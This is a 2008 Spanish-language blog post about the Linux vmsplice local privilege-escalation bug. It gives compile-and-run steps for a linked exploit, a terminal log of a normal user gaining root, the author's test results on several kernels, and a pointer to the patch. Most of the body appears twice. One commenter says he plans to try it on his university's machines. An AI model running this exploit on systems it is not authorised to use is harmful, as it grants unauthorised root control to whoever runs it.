Bug en kernel te da privilegios de root
2008-02-12 20:19:37-06
Software Libre
Se descubrió una vulnerabilidad bastante grave en el kernel según que es desde el 2.6.X al 2.6.24. El cual con ejecutar un exploit permite a un usuario normal tomar privilegios de root.
Aunque no es necesario es mi deber mencionar que ejecutar un exploit tiene sus riesgos y si lo ejecutas debe ser bajo tu responsabilidad y en tu propio sistema. (Hay que tener ética).
Para esto, hay 2 variantes (1, 2) del exploit, la ejecución es muy simple:
Si tienes el código fuente descargado, lo puedes guardar en un archivo llamado prueba.c, lo compilas simplemente con esto:
thot@%%%%:~$ gcc prueba.c -o prueba
-- Con eso tendrán un ejecutable llamado prueba
thot@%%%%:~$ whoami
thot
thot@%%%%:~$ ./prueba
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7dee000 .. 0xb7e20000
[+] root
root@%%%%:~# whoami
root
Ese es el resultado. Lo he probado en varias máquinas y el resultado no es muy alentador.
Lo he probado con kernel 2.6.15-r1 en gentoo, pero no tiene esa vulnerabilidad. Dice que no tiene la función vmsplice. (que es por donde funciona el exploit), seguramente fue desactivado cuando se compiló el kernel.
Con kernel 2.6.18-3 en Debian el exploit funciona
Lo probé en mi PC compilada (manualmente) con 2.6.24 y el exploit funciona.
Lo probé en mi laptop con el Debian 2.6.24-1 y ahí el exploit no funcionó.
Aquí el parche del kernel (5 líneas de código que solucionan el problema).
Vía kriptópolis
Aunque no es necesario es mi deber mencionar que ejecutar un exploit tiene sus riesgos y si lo ejecutas debe ser bajo tu responsabilidad y en tu propio sistema. (Hay que tener ética).
Para esto, hay 2 variantes (1, 2) del exploit, la ejecución es muy simple:
Si tienes el código fuente descargado, lo puedes guardar en un archivo llamado prueba.c, lo compilas simplemente con esto:
thot@%%%%:~$ gcc prueba.c -o prueba
-- Con eso tendrán un ejecutable llamado prueba
thot@%%%%:~$ whoami
thot
thot@%%%%:~$ ./prueba
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7dee000 .. 0xb7e20000
[+] root
root@%%%%:~# whoami
root
Ese es el resultado. Lo he probado en varias máquinas y el resultado no es muy alentador.
Lo he probado con kernel 2.6.15-r1 en gentoo, pero no tiene esa vulnerabilidad. Dice que no tiene la función vmsplice. (que es por donde funciona el exploit), seguramente fue desactivado cuando se compiló el kernel.
Con kernel 2.6.18-3 en Debian el exploit funciona
Lo probé en mi PC compilada (manualmente) con 2.6.24 y el exploit funciona.
Lo probé en mi laptop con el Debian 2.6.24-1 y ahí el exploit no funcionó.
Aquí el parche del kernel (5 líneas de código que solucionan el problema).
Vía kriptópolis
Permalink: http://www.mononeurona.org/users/entry/thot/1131
Comentblogs:1.- 
der_teufel wrote:
Rifado! mañana lo pruebo en los fedoras de la fac, jaja, aunque dudo que funcione, tienen versiones muy viejas...
Saludos!
2008-02-12 21:35:06-06
der_teufel wrote: Rifado! mañana lo pruebo en los fedoras de la fac, jaja, aunque dudo que funcione, tienen versiones muy viejas...
Saludos!
2008-02-12 21:35:06-06
